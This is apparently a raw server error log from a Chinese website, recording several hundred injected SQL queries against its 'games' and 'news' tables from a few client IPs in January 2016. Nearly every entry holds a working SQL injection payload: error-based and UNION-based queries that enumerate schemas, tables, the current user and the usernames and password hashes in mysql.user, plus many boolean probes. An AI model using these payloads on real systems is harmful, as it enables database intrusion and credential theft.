SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 5868 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x68756973656e) LIMIT 1,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'SQzI'='SQzI'
客户IP:111.74.215.73
时间 :2016-01-26 01:54:03

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 5582 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x68756973656e) LIMIT 2,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WKFr'='WKFr'
客户IP:111.74.215.73
时间 :2016-01-26 01:54:03

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 9490 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x68756973656e) LIMIT 3,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xdDa'='xdDa'
客户IP:111.74.215.73
时间 :2016-01-26 01:54:03

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='-1884' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b707171,IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20),0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:54:11

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='-5221' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b707171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6461796272656164)-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:54:39

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 9925 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6461796272656164)),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zcYq'='zcYq'
客户IP:111.74.215.73
时间 :2016-01-26 01:54:39

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6696 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6461796272656164) LIMIT 0,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zGeS'='zGeS'
客户IP:111.74.215.73
时间 :2016-01-26 01:54:39

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 3203 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6461796272656164) LIMIT 1,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cfGy'='cfGy'
客户IP:111.74.215.73
时间 :2016-01-26 01:54:40

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 7313 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6461796272656164) LIMIT 2,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'TuwV'='TuwV'
客户IP:111.74.215.73
时间 :2016-01-26 01:54:40

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 3033 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6461796272656164) LIMIT 3,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XuLh'='XuLh'
客户IP:111.74.215.74
时间 :2016-01-26 01:54:41

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 2100 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6461796272656164) LIMIT 4,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JMuT'='JMuT'
客户IP:111.74.215.73
时间 :2016-01-26 01:54:41

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='-1297' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b707171,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:57:31

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='-4458' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b707171,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM mysql.user-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:57:32

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 1435 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM mysql.user),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'mCtM'='mCtM'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:32

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 1261 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(user AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 0,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Sive'='Sive'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:33

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 4000 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 0,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'TWiL'='TWiL'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:34

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 1874 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(user AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 1,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tycq'='tycq'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:34

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 2812 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 1,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'CPNo'='CPNo'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:35

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 8788 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(user AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 2,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ffDw'='ffDw'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:36

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 4971 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 2,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NVXu'='NVXu'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:36

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 3300 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(user AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 3,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fSmX'='fSmX'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:36

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 4431 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 3,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'gtvm'='gtvm'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:37

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 3086 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(user AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 4,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eHOY'='eHOY'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:37

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 4537 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 4,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'qHWT'='qHWT'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:37

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6354 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(user AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 5,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xPnX'='xPnX'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:37

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6573 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM mysql.user LIMIT 5,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JRVl'='JRVl'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:38

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:54

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:54

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111'
客户IP:111.74.215.73
时间 :2016-01-26 01:57:58

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:03

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:04

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:06

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:06

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:06

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11'
客户IP:111.74.215.70
时间 :2016-01-26 01:58:27

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:58:27

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:58:27

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:27

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:58:27

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:58:27

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:31

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:58:31

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:58:31

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:31

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:58:31

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:58:31

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1 and(1=1)'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:51

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1 and(11=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:52

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11 and(1=1)'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:52

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1 and(1=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:53

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1' and '1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:55

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11 and(11=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:55

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11 and(1=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:56

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1' and '11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:56

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1' and '1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:56

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11' and '1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:57

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111 and(1=1)'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:58

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1)and(1=1'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:59

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11 and(1=1)'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:59

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11' and '11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:58:59

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111 and(11=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:00

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11 and(11=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:00

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11 and(1=1)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:00

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1)and(11=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:00

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11' and '1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:00

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111 and(1=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:01

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11 and(11=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:01

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111 and(1=1)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:01

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11 and(1=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:01

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1)and(1=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:01

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11 and(1=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:02

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11)and(1=1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:02

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111' and '1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:02

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111 and(11=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:02

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11)and(11=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:02

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1' and '%'=''
客户IP:111.74.215.73
时间 :2016-01-26 01:59:02

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1' and '11%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:03

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111 and(1=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:03

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11' and '1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:03

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111' and '11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:03

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11)and(1=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:03

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11' and '1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:04

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111' and '1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:04

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11' and '11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:04

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1' and '1%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:04

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11 and(1=1)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:04

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111' and '1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:04

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11' and '%'=''
客户IP:111.74.215.73
时间 :2016-01-26 01:59:05

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11' and '1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:05

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11' and '11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:05

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111)and(1=1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:05

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11 and(11=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:05

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111' and '11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:05

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11' and '11%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:05

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111)and(11=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:06

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11)and(1=1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:06

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11 and(1=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:06

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11' and '1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:06

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111' and '1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:06

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11' and '1%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:06

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11)and(11=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:07

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111)and(1=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:07

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11)and(1=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:07

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11' and '1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:08

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11)and(1=1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:08

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111)and(1=1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:08

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111' and '%'=''
客户IP:111.74.215.73
时间 :2016-01-26 01:59:08

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11' and '%'=''
客户IP:111.74.215.73
时间 :2016-01-26 01:59:08

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111' and '11%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:09

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11' and '11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:09

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111)and(11=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:09

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11)and(11=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:09

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11)and(1=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:09

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11' and '11%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:09

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111' and '1%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:10

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11' and '1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:10

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111)and(1=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:10

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11' and '1%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:10

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11' and '%'=''
客户IP:111.74.215.73
时间 :2016-01-26 01:59:10

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1 and(1=1)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:11

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11' and '11%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:11

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1 and(11=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:12

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11)and(1=1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:12

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11' and '1%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:12

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111' and '%'=''
客户IP:111.74.215.73
时间 :2016-01-26 01:59:12

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1 and(1=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:12

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11)and(11=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:13

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111' and '11%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:13

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11)and(1=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:13

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111' and '1%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:14

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1' and '1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:14

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11' and '%'=''
客户IP:111.74.215.73
时间 :2016-01-26 01:59:15

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1' and '11'='11'
客户IP:111.74.215.73
